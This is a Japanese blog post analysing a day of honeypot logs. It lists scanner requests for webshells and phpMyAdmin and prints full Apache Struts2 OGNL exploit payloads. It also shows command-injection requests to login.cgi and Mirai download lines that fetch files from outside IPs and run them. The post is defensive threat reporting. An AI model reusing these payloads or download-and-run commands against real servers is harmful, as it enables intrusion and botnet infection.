S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/19)

ハニーポットのログ分析(2018/08/19)

honeypot

WOWhoneypotの2018/08/19(日) (運用77日目)の簡易分析です。
本日の総アクセス件数は 273件です。以下が全アクセスログです。

30 2018-08-19 GET /
6 2018-08-19 POST /register.jsp
6 2018-08-19 POST /main.jsp
6 2018-08-19 POST /login/login.jsp
6 2018-08-19 POST /login.jsp
6 2018-08-19 POST /login.do
6 2018-08-19 POST /login.action
6 2018-08-19 POST /index.jsp
6 2018-08-19 POST /index.do
6 2018-08-19 POST /index.action
6 2018-08-19 POST /default.jsp
6 2018-08-19 POST /
6 2018-08-19 GET /index.action
5 2018-08-19 POST /login/indexAction.action
5 2018-08-19 POST /indexAction.action
3 2018-08-19 POST /qq.php
3 2018-08-19 POST /qaq.php
2 2018-08-19 POST /xx.php
2 2018-08-19 POST /q.php
2 2018-08-19 GET /www/phpMyAdmin/index.php
2 2018-08-19 GET /web/phpMyAdmin/index.php
2 2018-08-19 GET /tools/phpMyAdmin/index.php
2 2018-08-19 GET /phpMyAdmin/index.php
2 2018-08-19 GET /claroline/phpMyAdmin/index.php
2 2018-08-19 GET /admin/phpMyAdmin/index.php
1 2018-08-19 PROPFIND /
1 2018-08-19 POST /zuoshou.php
1 2018-08-19 POST /yumo.php
1 2018-08-19 POST /yao.php
1 2018-08-19 POST /xw.php
1 2018-08-19 POST /xw1.php
1 2018-08-19 POST /xshell.php
1 2018-08-19 POST /xiao.php
1 2018-08-19 POST /xiaoma.php
1 2018-08-19 POST /wuwu11.php
1 2018-08-19 POST /wshell.php
1 2018-08-19 POST /w.php
1 2018-08-19 POST /weixiao.php
1 2018-08-19 POST /webslee.php
1 2018-08-19 POST /wc.php
1 2018-08-19 POST /wanan.php
1 2018-08-19 POST /system.php
1 2018-08-19 POST /ssaa.php
1 2018-08-19 POST /s.php
1 2018-08-19 POST /sheep.php
1 2018-08-19 POST /phpstudy.php
1 2018-08-19 POST /pe.php
1 2018-08-19 POST /mz.php
1 2018-08-19 POST /mx.php
1 2018-08-19 POST /min.php
1 2018-08-19 POST /log.php
1 2018-08-19 POST /lindex.php
1 2018-08-19 POST /l8.php
1 2018-08-19 POST /l7.php
1 2018-08-19 POST /ip.php
1 2018-08-19 POST /infoo.php
1 2018-08-19 POST /hm.php
1 2018-08-19 POST /hh.php
1 2018-08-19 POST /feixiang.php
1 2018-08-19 POST /fack.php
1 2018-08-19 POST /defect.php
1 2018-08-19 POST /db_session.init.php
1 2018-08-19 POST /db.init.php
1 2018-08-19 POST /db__.init.php
1 2018-08-19 POST /data.php
1 2018-08-19 POST /conflg.php
1 2018-08-19 POST /cmd.php
1 2018-08-19 POST /cainiao.php
1 2018-08-19 POST /aw.php
1 2018-08-19 POST /aotu.php
1 2018-08-19 POST /angge.php
1 2018-08-19 POST /ak.php
1 2018-08-19 POST /ak47.php
1 2018-08-19 POST /9678.php
1 2018-08-19 POST /56.php
1 2018-08-19 POST /12.php
1 2018-08-19 GET /x.php
1 2018-08-19 GET /xampp/phpmyadmin/index.php
1 2018-08-19 GET /wpo.php
1 2018-08-19 GET /wp-config.php
1 2018-08-19 GET /webdav/
1 2018-08-19 GET /uploader.php
1 2018-08-19 GET /typo3/phpmyadmin/index.php
1 2018-08-19 GET /text.php
1 2018-08-19 GET /test.php
1 2018-08-19 GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /register.jsp
1 2018-08-19 GET /_query.php
1 2018-08-19 GET /pmd/index.php
1 2018-08-19 GET /pma-old/index.php
1 2018-08-19 GET /pmamy/index.php
1 2018-08-19 GET /pmamy2/index.php
1 2018-08-19 GET /pma/index.php
1 2018-08-19 GET /PMA2/index.php
1 2018-08-19 GET /phpmyadmin/phpmyadmin/index.php
1 2018-08-19 GET /phpMyAdminold/index.php
1 2018-08-19 GET /phpMyAdmin.old/index.php
1 2018-08-19 GET /phpmyadmin-old/index.php
1 2018-08-19 GET /phpmyadmin/index.php
1 2018-08-19 GET /phpMyadmin_bak/index.php
1 2018-08-19 GET /phpmyadmin2/index.php
1 2018-08-19 GET /phpmyadmin1/index.php
1 2018-08-19 GET /phpmyadmin0/index.php
1 2018-08-19 GET /phpma/index.php
1 2018-08-19 GET /phpadmin/index.php
1 2018-08-19 GET /mysql/index.php
1 2018-08-19 GET /mysqladmin/index.php
1 2018-08-19 GET /mysql-admin/index.php
1 2018-08-19 GET /myadmin/index.php
1 2018-08-19 GET /myadmin2/index.php
1 2018-08-19 GET /muhstiks.php
1 2018-08-19 GET /muhstik.php
1 2018-08-19 GET /muhstik-dpr.php
1 2018-08-19 GET /muhstik2.php
1 2018-08-19 GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /main.jsp
1 2018-08-19 GET /lol.php
1 2018-08-19 GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/login.jsp
1 2018-08-19 GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.jsp
1 2018-08-19 GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/indexAction.action
1 2018-08-19 GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.do
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$
1 2018-08-19 GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.action
1 2018-08-19 GET /lala.php
1 2018-08-19 GET /lala-dpr.php
1 2018-08-19 GET /java.php
1 2018-08-19 GET /index.php
1 2018-08-19 GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.jsp
1 2018-08-19 GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.do
1 2018-08-19 GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /indexAction.action
1 2018-08-19 GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET hxxp://112.35.63[.]31:10083/index.php
1 2018-08-19 GET hxxp://112.35.53[.]83:10083/index.php
1 2018-08-19 GET /help.php
1 2018-08-19 GET /desktop.ini.php
1 2018-08-19 GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /default.jsp
1 2018-08-19 GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /db_pma.php
1 2018-08-19 GET /db/index.php
1 2018-08-19 GET /db_cts.php
1 2018-08-19 GET /dbadmin/index.php
1 2018-08-19 GET /cmx.php
1 2018-08-19 GET /cmv.php
1 2018-08-19 GET /cmd.php
1 2018-08-19 GET /cmdd.php
1 2018-08-19 GET /admin/PMA/index.php
1 2018-08-19 GET /admin/pma/index.php
1 2018-08-19 GET /admin/phpmyadmin/index.php
1 2018-08-19 GET /admin/phpmyadmin2/index.php
1 2018-08-19 GET /admin/mysql/index.php
1 2018-08-19 GET /admin/mysql2/index.php
1 2018-08-19 GET /admin/index.php
1 2018-08-19 GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f

phpMyAdmin関連()とphpに対するGET/POSTと/へのアクセス()を除外したアクセス数です。

6 2018-08-19 GET /index.action
6 2018-08-19 POST /index.action
6 2018-08-19 POST /login.action
6 2018-08-19 POST /index.jsp
6 2018-08-19 POST /main.jsp
6 2018-08-19 POST /default.jsp
6 2018-08-19 POST /register.jsp
6 2018-08-19 POST /login.jsp
6 2018-08-19 POST /login/login.jsp
6 2018-08-19 POST /index.do
6 2018-08-19 POST /login.do
5 2018-08-19 POST /indexAction.action
5 2018-08-19 POST /login/indexAction.action
1 2018-08-19 GET /indexAction.action
1 2018-08-19 GET /login.action
1 2018-08-19 GET /login/indexAction.action
1 2018-08-19 GET /index.jsp
1 2018-08-19 GET /register.jsp
1 2018-08-19 GET /main.jsp
1 2018-08-19 GET /default.jsp
1 2018-08-19 GET /login.jsp
1 2018-08-19 GET /login/login.jsp
1 2018-08-19 GET /index.do
1 2018-08-19 GET /login.do
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://212.237.32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-19 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/ff;sh%20/tmp/ff%27$
1 2018-08-19 GET /webdav/
1 2018-08-19 GET hxxp://112.35.63.31:10083/index.php
1 2018-08-19 GET hxxp://112.35.53.83:10083/index.php
1 2018-08-19 GET /register.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /main.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login/indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /login.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.do/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.action?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET /indexAction.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /index.action/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /default.jsp/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f
1 2018-08-19 GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest
1 2018-08-19 GET //%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f 

 本日は色々と珍しい、新しい、アクセスが来ています。

アクセス先パスの拡張子が「.action」「.jsp」「.do」のものは、Apache Struts2脆弱性を狙った攻撃と考えられます。
ただし、その攻撃手法は2種類で、それぞれ攻撃者が別と思われます。
1つのものは「index.action」だけのアクセスで、これはContesnt-typeに存在する脆弱性S-045を攻撃するものです。これは本日は4件程度ですが、以前からもよく観測しています。
もう一つはBody部に攻撃のペイロードと思われるものがあります。ちょっと調べましたが、何の脆弱性をついているのかは不明でした。アクセスパスが長いものもこちらと同様にStruts脆弱性をついているものと思われます。
以下にその2種類のアクセスログを例示します。

GET /index.action HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: %{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):*1.(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("/"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

POST /index.action HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.12.4
Content-type: application/x-www-form-urlencoded
Content-Length: 566

debug=command&expression=#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().print("web"),#resp.getWriter().print("path:"),#resp.getWriter().print(#req.getSession().getServletContext().getRealPath("/")),#resp.getWriter().flush(),#resp.getWriter().close()

もう一つの方のログは以下と思われます。

http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/

 

本日のハンティングログは以下です。Mirai亜種2つとS-045のStruts2脆弱性を攻撃していたものです。

1 2018-08-19 wget hxxp://212.237.32.62/k
1 2018-08-19 wget hxxp://209.141.33.86/d
1 2018-08-19 wget -c hxxp://23.249.162.123:9998/servic 

 

以上です。

*1:#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class